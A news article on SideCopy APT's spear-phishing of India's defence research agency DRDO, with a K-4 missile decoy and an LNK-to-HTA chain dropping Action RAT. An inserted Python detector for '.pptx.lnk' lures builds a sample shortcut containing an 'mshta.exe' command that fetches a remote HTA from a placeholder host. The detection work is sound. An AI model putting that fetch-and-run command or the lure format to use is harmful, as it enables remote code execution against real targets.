SideCopy APT Targets India's Premier Defense Research Agency
SideCopy APT Used Decoy Documents in Spear-Phishing Attack on DRDO
Security researchers uncovered a Pakistani cyberespionage group employing fresh tactics to target workers at India's Defense Research and Development Organization and steal sensitive military secrets.
The researchers tracked SideCopy APT's use of research material as a decoy to plant info-stealing malware. DRDO uses its network of 52 laboratories across India and a pool of more than 5,000 scientists to develop, test and supply cutting-edge military technologies to the Indian armed forces.
SideCopy APT traditionally uses spear-phishing to gain initial entry. Emails in the latest campaign purportedly contain research material about military technologies sent as attachments.
Cyble said a phishing email sent to a DRDO worker carried a malicious zip attachment that contained a LNK file named "DRDO - K4 Missile Clean room.pptx.lnk". The K-4 is a nuclear-capable submarine-launched ballistic missile developed by DRDO.
This phishing attack differed from other attacks because the zip file contained a PowerPoint file with actual information about the K-4 missile. The infection chain begins with the user extracting the file and running the .lnk file. That downloads an HTML application that opens the slide presentation.
It also begins a concatenation operation involving multiple HTML applications that ultimately results in dropping a variant of the Action Rat Malware whose files are loaded into the operating system with names that mimic essential Windows components.
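A mail-gateway check for the lure format described above, added here as an example and not code from Cyble or the article: it scans a zip attachment for shortcut entries that hide behind a document double extension (".pptx.lnk") and for shortcuts whose embedded strings reference mshta, the host that runs HTML applications. The sample zip, the shortcut bytes and the URL placeholder are constructed for the demonstration.

```python
import io
import re
import zipfile

# Document-looking extensions that a lure places before the real ".lnk".
DOC_EXTS = ("pptx", "ppt", "docx", "doc", "pdf", "xlsx")
DOUBLE_EXT = re.compile(r"\.(%s)\.lnk$" % "|".join(DOC_EXTS), re.IGNORECASE)

# MS-SHLLINK header: HeaderSize 0x4C followed by the ShellLink CLSID.
LNK_MAGIC = (b"\x4c\x00\x00\x00"
             b"\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")


def scan_zip_for_lnk_lures(zip_bytes):
    """Return [(entry_name, reason), ...] for suspicious shortcut entries.

    Two checks, matching the chain described above: a document-looking double
    extension ending in .lnk, and a genuine LNK whose embedded strings
    reference mshta (the host used to run HTML applications).
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".lnk"):
                continue
            if DOUBLE_EXT.search(name):
                findings.append((name, "document double extension before .lnk"))
            data = zf.read(name)
            if not data.startswith(LNK_MAGIC):
                findings.append((name, "entry named .lnk but lacks ShellLink header"))
                continue
            low = data.lower()
            # Shortcut string data is usually UTF-16LE, so check both encodings.
            if b"mshta" in low or "mshta".encode("utf-16-le") in low:
                findings.append((name, "shortcut references mshta"))
    return findings


def build_sample_zip():
    """Constructed sample attachment (not from the real campaign)."""
    # Fake shortcut: a valid 76-byte LNK header followed by a UTF-16LE command string.
    fake_lnk = LNK_MAGIC + b"\x00" * 56 + \
        "mshta.exe http://[placeholder]/x.hta".encode("utf-16-le")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("DRDO - K4 Missile Clean room.pptx.lnk", fake_lnk)
        zf.writestr("notes.txt", "benign text file")
    return buf.getvalue()


if __name__ == "__main__":
    for entry, reason in scan_zip_for_lnk_lures(build_sample_zip()):
        print(f"{entry}: {reason}")
```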
The malware's capabilities include obtaining or retrieving information about specific files and available drives, installing additional payloads and transmitting files to the command-and-control server.
Cyble researchers told Information Security Media Group that SideCopy APT emulates the tactics of Sidewinder APT, a threat group believed to have Indian roots. "This group has been observed to target government and military officials in India and Afghanistan specifically and continuously evolves its techniques while incorporating new tools into its arsenal," they said.
SideCopy APT previously targeted the Indian Army, the National Cadet Corps of India and the National Council of Educational Research and Training using similar tactics (see: Report: SideCopy APT Used New Tactics in Recent Attacks).
Malwarebytes found in 2021 that the group had targeted Indian Army entities using a decoy PDF file named "Email facility address list of the ERE units: 20 Sept 2021." The threat group used the decoy file "Living the values, a value-narrative to grass-root leadership" when it targeted NCERT.